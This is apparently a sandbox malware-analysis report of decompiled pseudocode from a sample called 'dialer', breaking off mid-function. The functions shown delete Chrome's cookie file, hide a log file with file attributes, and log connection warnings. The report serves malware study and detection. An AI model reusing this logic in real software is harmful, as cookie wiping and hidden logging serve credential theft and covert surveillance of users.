Opcode ID: eb516415a4b3ec4530c758ad70a56fa9a25eb0cbb66f28b812b7aae8f3ce29ef
Instruction ID: 0a03f5c56435e7b7bf565aa8bafc0807e20b5707f116f6618a4dc7084de369cb
Opcode Fuzzy Hash: eb516415a4b3ec4530c758ad70a56fa9a25eb0cbb66f28b812b7aae8f3ce29ef
Instruction Fuzzy Hash: 0401683320D7112E96117FB57C8569B2A44DB8D379F30223FF111512F1FE585C11564E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A320, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A320(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				L00401FA7();
				if(DeleteFileA(L00401F75( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00402064(_t20, _t28);
						E0040AA8C(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				L00401FA7();
				return _t21;
			}

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040A35C
GetLastError.KERNEL32 ref: 0040A366

Strings

[Chrome Cookies not found], xrefs: 0040A380
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A327
[Chrome Cookies found, cleared!], xrefs: 0040A38C
UserProfile, xrefs: 0040A32C

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 48f30c73d3cdd6f5fc39c1c0410eba610e0be0163ac94731c68b7afb8454ecb1
Instruction ID: 71bab83c232eb3aa80a51950a53fe90676adfd60c2a68e252f2a60659ee967f7
Opcode Fuzzy Hash: 48f30c73d3cdd6f5fc39c1c0410eba610e0be0163ac94731c68b7afb8454ecb1
Instruction Fuzzy Hash: 38016761A4030556CB09BAB5DD1BCAE7724A912705B50017FFC02731D2FD7D591D85DF

Uniqueness

Uniqueness Score: -1.00%

Function 004050E5, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004050E5(void* __ecx, void* __edi, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t24 = _t23 - 0x18;
					E00402064(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
					E00402064(_t17, _t24 - 0x18, "[WARNING]");
					E004165D8(_t17, __edi);
				}
				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t22 + 0x54));
				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
				CloseHandle( *(_t22 + 0x58));
				return 1;
			}

0x004050e9
0x004050ef
0x00000000
0x0040514d
0x004050f5
0x004050f7
0x00405101
0x00405110
0x00405115
0x0040511a
0x0040512c
0x0040512f
0x0040513a
0x00405143
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405123
SetEvent.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040512F
WaitForSingleObject.KERNEL32(?,000000FF,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040513A
CloseHandle.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405143

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

Strings

Connection KeepAlive disabled, xrefs: 004050FC
[WARNING], xrefs: 0040510B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive disabled$[WARNING]
API String ID: 2993684571-804309475
Opcode ID: 62cbe304c64b1b052eb63cd763b1aa4c4c9c451a961974cb8a0c296cbd61470b
Instruction ID: 4a3f3a8db73678ad982533098c460406716fc9acf26f117caeb6870947dcbcc6
Opcode Fuzzy Hash: 62cbe304c64b1b052eb63cd763b1aa4c4c9c451a961974cb8a0c296cbd61470b
Instruction Fuzzy Hash: 4CF0C8718007507BDB113F759D0EA677F98DB01356F00057AF901926F2D9B585548B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0043B80E, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043B7BF,0000000C,?,0043B75F,0000000C,00468178), ref: 0043B82E
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043B841
FreeLibrary.KERNEL32(00000000,?,?,?,0043B7BF,0000000C,?,0043B75F,0000000C,00468178), ref: 0043B864

Strings

mscoree.dll, xrefs: 0043B827
CorExitProcess, xrefs: 0043B839
@, xrefs: 0043B852

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$@
API String ID: 4061214504-2482086136
Opcode ID: 6526ced06a94fd25e04ba9610b20bb07d14150e0d13d4829313775084854035e
Instruction ID: 4e1649a62f6ee3b09e01f81ad3869626034710fcbdaf9da01478699b77b668ad
Opcode Fuzzy Hash: 6526ced06a94fd25e04ba9610b20bb07d14150e0d13d4829313775084854035e
Instruction Fuzzy Hash: A1F04430600618BBCB155F65EC09B9EBFB8EB04757F5040BAF905A2261DB799E44CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004160D6, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30
sleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004160D6(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				WCHAR* _t13;
				void* _t15;

				_t16 = _t15 - 0x18;
				_t13 = __ecx;
				E00402064(_t7, _t15 - 0x18, "Alarm has been triggered!");
				E00402064(_t7, _t16 - 0x18, "[ALARM]");
				E004165D8(_t7, _t11);
				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}

0x004160d8
0x004160db
0x004160e4
0x004160f3
0x004160f8
0x00416116
0x0041611d
0x0041612a

APIs

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416108
PlaySoundW.WINMM(00000000,00000000), ref: 00416116
Sleep.KERNEL32(00002710), ref: 0041611D
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416126

Strings

Alarm has been triggered!, xrefs: 004160DF
[ALARM], xrefs: 004160EE

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm has been triggered!$[ALARM]
API String ID: 614609389-1190268461
Opcode ID: 68993d820f74bbe01997498476c5e457ff48922b1f7a2ea0347d234afb1a11a0
Instruction ID: 2d10eecb587f4eb50cd82e886fdd1c0de5a54b8a21b058e5acdb0cdc04fd1f38
Opcode Fuzzy Hash: 68993d820f74bbe01997498476c5e457ff48922b1f7a2ea0347d234afb1a11a0
Instruction Fuzzy Hash: FFE09262A00320379524377B7D0FD2F2D28CAC2BA2B01006FFA08661D29D944900C6FB

Uniqueness

Uniqueness Score: -1.00%

Function 004350A9, Relevance: 9.3, APIs: 6, Instructions: 284
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004350A9(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = L00439E14();
					_t159 = 0x16;
					 *_t113 = _t159;
					E0043626D();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = L00439E14();
					_t158 = 0x16;
					 *_t111 = _t158;
					E0043626D();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = L00439E14();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				L00441D1C(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E00441551( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E0044157D( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E004415A9( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E0043B307();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E004504E0(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E00450430(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0045
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = E004504E0(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E00450430(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = E004504E0(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E00450430(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = E00441D6D(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E0043B307();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = E00441D6D(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E0043B307();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0043629A();
				asm("int3");
				_push(_t155);
				_t69 = E0043B2A2(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E004350A9(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}

APIs

__allrem.LIBCMT ref: 00435236
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435252
__allrem.LIBCMT ref: 00435269
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435287
__allrem.LIBCMT ref: 0043529E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004352BC

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: cf421956008c0296b8590752cd63f23a946e04caaf8df9a8b491fe77ede8eb7a
Instruction ID: 0f9574e79e851dcb61412f9348aa4e336ac1525895054df9afc56f3bdc95fefa
Opcode Fuzzy Hash: cf421956008c0296b8590752cd63f23a946e04caaf8df9a8b491fe77ede8eb7a
Instruction Fuzzy Hash: B6813E72A00F059BEB20AE69CC42B6B73E8DF49768F14552FF511D7382E778D9408B98

Uniqueness

Uniqueness Score: -1.00%

Function 00408C73, Relevance: 9.2, APIs: 6, Instructions: 168
sleepCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00408C73(void* __ecx, char* __edx) {
				char _v1028;
				char _v1040;
				char _v1064;
				char _v1076;
				void* _v1080;
				void* _v1088;
				void* _v1092;
				char _v1100;
				char _v1124;
				void* _v1132;
				char _v1136;
				void* _v1152;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t34;
				char* _t36;
				void* _t38;
				int _t42;
				void* _t49;
				void* _t53;
				void* _t65;
				int _t66;
				void* _t68;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t83;
				signed int _t141;
				signed int _t142;
				void* _t143;
				void* _t144;
				signed int _t145;

				_t131 = __edx;
				_t142 = _t141 & 0xfffffff8;
				_t145 = _t142;
				_t143 = _t142 - 0x464;
				_t83 = __ecx;
				_t136 = __ecx + 4;
				do {
					Sleep(0x1388);
					E00408BC2(_t83, _t131);
					_t131 = 0x45f714;
					if(E004074E6(_t145) != 0) {
						if(L00409DB7() == 0) {
							CreateDirectoryW(L00401ECB(0x46c3c8), 0);
						}
						_t133 = _t83 + 0x60;
						_t34 = GetFileAttributesW(L00401ECB(_t83 + 0x60));
						_t148 = _t34 & 0x00000002;
						if((_t34 & 0x00000002) != 0) {
							SetFileAttributesW(L00401ECB(_t133), 0x80);
						}
						_t36 = L00401F75(L00401E29(0x46c578, _t131, _t148, 0x12));
						_t149 =  *_t36;
						if( *_t36 != 0) {
							E004020B5(_t83,  &_v1124);
							_t38 = E00402469();
							E00405A2F( &_v1028, L00401F75(0x46c560), _t38);
							_t42 = PathFileExistsW(L00401ECB(_t133));
							__eflags = _t42;
							if(_t42 != 0) {
								E004020B5(_t83,  &_v1100);
								_t65 = L00401ECB(_t133);
								_t131 =  &_v1100;
								_t66 = E00417334(_t65,  &_v1100);
								__eflags = _t66;
								if(_t66 != 0) {
									_t68 = E00402469();
									L00401FB1( &_v1136,  &_v1100, _t136, E00405B57(_t83,  &_v1028,  &_v1100,  &_v1076, L00401F75( &_v1100), _t68));
									L00401FA7();
								}
								L00401FA7();
							}
							__eflags = E00402469() + _t43;
							E00403416(E0040208B(_t83,  &_v1076, _t131, __eflags, L00401ECB(_t136), E00402469() + _t43));
							L00401FA7();
							_t49 = E00402469();
							E00405B57(_t83,  &_v1040, _t131,  &_v1064, L00401F75( &_v1136), _t49);
							_t53 = L00401ECB(_t133);
							_t144 = _t143 - 0x18;
							E004020CC(_t83, _t144, _t131, __eflags,  &_v1076);
							E004173A6(_t53);
							_t143 = _t144 + 0x18;
							L00401FA7();
							L00401FA7();
						} else {
							_t74 = L00401ECB(_t133);
							_t75 = E00402469();
							_t76 = L00401ECB(_t83 + 4);
							_t131 = _t75 + _t75;
							E0041729F(_t76, _t75 + _t75, _t74, 1);
						}
						_t136 = _t83 + 4;
						L00409DCB(_t83, _t83 + 4, 0x45f714);
						if( *((char*)(L00401F75(L00401E29(0x46c578, _t131, _t149, 0x13)))) != 0) {
							SetFileAttributesW(L00401ECB(_t133), 6);
						}
					}
				} while ( *((char*)(_t83 + 0x49)) != 0);
				return 0;
			}

0x00408c73
0x00408c76
0x00408c76
0x00408c79
0x00408c80
0x00408c84
0x00408c87
0x00408c8c
0x00408c94
0x00408c99
0x00408ca7
0x00408cb9
0x00408cc8
0x00408cc8
0x00408cce
0x00408cd9
0x00408cdf
0x00408ce1
0x00408cf0
0x00408cf0
0x00408d04
0x00408d09
0x00408d0c
0x00408d3f
0x00408d49
0x00408d5e
0x00408d6b
0x00408d71
0x00408d73
0x00408d79
0x00408d80
0x00408d85
0x00408d8b
0x00408d90
0x00408d92
0x00408d98
0x00408dbb
0x00408dc4
0x00408dc4
0x00408dcd
0x00408dcd
0x00408dd9
0x00408df2
0x00408dfb
0x00408e04
0x00408e1d
0x00408e24
0x00408e29
0x00408e35
0x00408e3c
0x00408e41
0x00408e48
0x00408e51
0x00408d0e
0x00408d12
0x00408d1a
0x00408d26
0x00408d2b
0x00408d2f
0x00408d35
0x00408e56
0x00408e60
0x00408e7b
0x00408e87
0x00408e87
0x00408e7b
0x00408e8d
0x00408e9f

APIs

Sleep.KERNEL32(00001388), ref: 00408C8C

Part of subcall function 00408BC2: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408C99), ref: 00408BF8
Part of subcall function 00408BC2: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408C99), ref: 00408C07
Part of subcall function 00408BC2: Sleep.KERNEL32(00002710,?,?,?,00408C99), ref: 00408C34
Part of subcall function 00408BC2: CloseHandle.KERNEL32(00000000,?,?,?,00408C99), ref: 00408C3B

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00408CC8
GetFileAttributesW.KERNEL32(00000000), ref: 00408CD9
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00408CF0
PathFileExistsW.SHLWAPI(00000000,00000012), ref: 00408D6B

Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0045F714), ref: 00408E87

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID:
API String ID: 3795512280-0
Opcode ID: 89343ba67ea1750662944c7391dd8e58eaa68ab1e52b7544c71f027d11ba10c6
Instruction ID: f62d497fd21a8fbb92a4ab55742cfbb6ebdd3e5d4586ef37a2809750a595cafc
Opcode Fuzzy Hash: 89343ba67ea1750662944c7391dd8e58eaa68ab1e52b7544c71f027d11ba10c6
Instruction Fuzzy Hash: 57519F7160430056CB15BB32CD669AF77A59F90349F00093FF942B72E2EF7C9A06869E

Uniqueness

Uniqueness Score: -1.00%

Function 0043FC74, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0043FC74(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				void* _v64;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				void* _t177;
				signed short* _t179;
				intOrPtr* _t180;
				intOrPtr* _t181;
				signed int* _t183;
				signed int _t184;
				signed int** _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				void* _t208;

				_t208 = __fp0;
				_t149 = __ecx;
				_t86 =  *0x46a00c; // 0x3dad585e
				_v8 = _t86 ^ _t187;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t183 = _a20;
				_v32 = _t183;
				_t91 = _a8;
				if(_t91 == 0) {
					_t179 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t179 =  *(_t143 + 0x158);
					} else {
						_t179 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t194 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = L00440FE7(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
					} else {
						_t129 = E00441129(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t184 = 0;
							__eflags = 0;
							L18:
							_v28 = _t184;
							if(_t184 == 0) {
								L30:
								E004304BD(0);
								_t183 = _v32;
								while(1) {
									L113:
									_t172 =  *_t179 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t183;
									if( *_t183 == 0) {
										L28:
										L29:
										return E0042F61B(_v8 ^ _t187);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t179;
									_t144 = _t179;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t98 = E0043F03E(_t145, _t153, _t179, _t208, _v52, _t97, _v48, _v40, _t183, _t145, _v32);
												_t188 = _t188 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(L00439E14())) = 0x16;
													goto L29;
												}
												L112:
												_t179 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t179 =  &(_t179[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t183 =  *_t183 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
